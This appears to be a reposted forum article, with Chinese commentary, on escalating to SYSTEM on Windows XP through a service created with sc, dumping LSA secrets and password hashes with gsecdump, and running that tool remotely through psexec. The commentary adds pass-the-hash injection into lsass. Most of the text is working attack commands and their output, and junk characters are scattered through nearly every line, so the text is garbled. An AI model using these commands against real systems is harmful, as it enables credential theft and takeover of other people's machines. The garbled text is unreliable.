o get a DOS Prompt as NT system:
# F0 c0 Y1 N# m
" Z6 Y4 Y& K: o% k' y6 z: `$ RC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact# w0 u! g! k0 Y
[SC] CreateService SUCCESS
3 r5 w l& l( b8 @
+ U$ A; m j. z j: qC:\>sc start shellcmdline, s8 Y# e( P) h6 G1 @
[SC] StartService FAILED 1053:0 ]* m9 \( j1 y0 }" d( @/ h
5 F9 e7 @2 q* [9 e; o: x6 T3 Y* KThe service did not respond to the start or control request in a timely fashion.& g, N7 O5 `8 r/ A: X
; b! n/ a% L+ S1 Z- U' E# j
C:\>sc delete shellcmdline z p J# @" b! j: t1 U
[SC] DeleteService SUCCESS
: e( u& ]4 t; e! W! R' U9 l$ M' F7 V& h- F' l
------------
+ l! f& e' k0 a& B. _/ a3 q
) C. ^6 Q, C9 @; CThen in the new DOS window:
" W* h: U! Q: i; Z% r7 N" [1 s# R" L6 \- B
Microsoft Windows XP [Version 5.1.2600]' u+ _. G3 K' O t, T0 h5 Y
(C) Copyright 1985-2001 Microsoft Corp.
. j! |% _! o6 T
; d0 ]& W( ^& ]# r. `+ C4 c1 mC:\WINDOWS\system32>whoami. @5 m& j* Q! J9 N1 ?' C" [
NT AUTHORITY\SYSTEM# I J8 j$ y" A2 Y9 u
! y, y7 l- D: f
C:\WINDOWS\system32>gsecdump -h
6 E! r6 d# g, z$ h. ~gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
4 Z' q( Y! k( p' g0 g3 z, ]usage: gsecdump [options]
, ~& a* y- l/ e. p3 h: A# a0 Y$ ^
% i: D) k; p( z9 @% P: s' ?. aoptions:
, N. @) F0 ~; k& E- U( o3 H9 P4 t-h [ --help ] show help
% L" y f1 k% M+ x3 J-a [ --dump_all ] dump all secrets
/ g, C: h8 x$ V' q, C9 v& ^' ]2 Q-l [ --dump_lsa ] dump lsa secrets
6 _- G( [( G5 E1 u7 R! ^-w [ --dump_wireless ] dump microsoft wireless connections
" l- M7 o% D% i-u [ --dump_usedhashes ] dump hashes from active logon sessions
0 Z; W2 W7 [( \% z* p-s [ --dump_hashes ] dump hashes from SAM/AD I! ]& F' {8 T( Y. L4 @5 _
4 M/ P0 ?4 u' o, P0 h( C
Although I like to use:
' H9 {+ ]& R- c+ M: ? p! w; X d: E; o X' W( w2 b1 n- q( }
PsExec v1.83 - Execute processes remotely
9 q1 Z! ]# E* @' ]Copyright (C) 2001-2007 Mark Russinovich$ L/ ], E8 p; g3 v, B# `
Sysinternals - 链接标记[url]www.sysinternals.com[/url]! X9 }! n) _9 h; }8 n
3 Q+ ~7 e5 f5 i9 p/ L6 iC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT* F2 W: b& G. C
( n) V6 t D. Q7 c+ M/ c- |
to get the hashes from active logon sessions of a remote system." p8 z# q2 H7 F/ z4 Z' i
1 {& @ v3 F0 B( b, MThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.; D* r2 i2 U/ u9 F2 j" h3 X5 J
8 y4 u5 z6 {' S7 f" ^
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.: f+ {1 n& r$ N# I# o E) f
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]4 n5 F* q& f& q/ M0 m
' a2 c8 H. Y7 A" e- a
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。! `& n: |7 j7 N
|